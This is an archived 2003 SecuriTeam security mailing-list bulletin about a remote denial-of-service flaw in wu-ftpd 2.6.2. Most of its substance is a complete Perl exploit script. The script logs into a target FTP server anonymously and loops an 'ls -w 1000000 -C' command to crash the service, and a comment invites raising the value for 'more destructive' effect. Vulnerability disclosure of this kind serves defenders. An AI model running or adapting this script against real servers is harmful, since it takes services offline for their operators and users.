[EXPL] Wu-FTPd Remote DoS (/bin/ls)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/02/03

  • Next message: SecuriTeam: "[NEWS] Default Password List (Default passwords sometimes stay for good)"
    To: list@securiteam.com
    Date: 2 Nov 2003 16:11:33 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Wu-FTPd Remote DoS (/bin/ls)
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in Wu-FTPd allows remote attackers to call the /bin/ls
    utility with special parameters causing the Wu-FTPd to fail.

    DETAILS

    Vulnerable systems:
     * wu-ftpd version 2.6.2

    Exploit:
    #!/usr/bin/perl

    # DoS sploit for ls
    # tested against wu-ftpd 2.6.2

    # coded by (c) druid
    # greets to viator

    use Net::FTP;

    (($target = $ARGV[0])&&($count = $ARGV[1])) || die "usage:$0 <target>
    <count>";
    my $user = "anonymous";
    my $pass = "halt\@xyu.com";
    $cols=1000000;#you can increase this value for more destructive result ;)

    print ":: Trying to connect to target system at: $target...\n"; $ftp =
    Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
    connect: $!";
    print "Connected!\n";
    $ftp->login($user, $pass) || die "could not login: $!";
    print "Logged in!\n";
    $ftp->cwd("/");
    while ($count)
    {
    $ftp->ls("-w $cols -C");
     $count--;
    }
    print "Done!\n";
    $ftp->quit;

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:zlo@cyberspace.org> Druid.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Default Password List (Default passwords sometimes stay for good)"

    Relevant Pages

    • [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam mailing list. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] 3Com FTP Server Buffer Overflow (CD)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... overflow in its parsing of the 'CD' command. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [TOOL] Automagic SQL Injector
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The Automagic SQL Injector is part of the Sec-1 Exploit Arsenal provided ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] Wu-FTPd SKEY Stack Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Wu-FTPd supports SKEY ... To protect you from this vulnerability, disable SKEY support, or apply the ...
      (Securiteam)
    • [EXPL] TinyWeb Server DoS Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)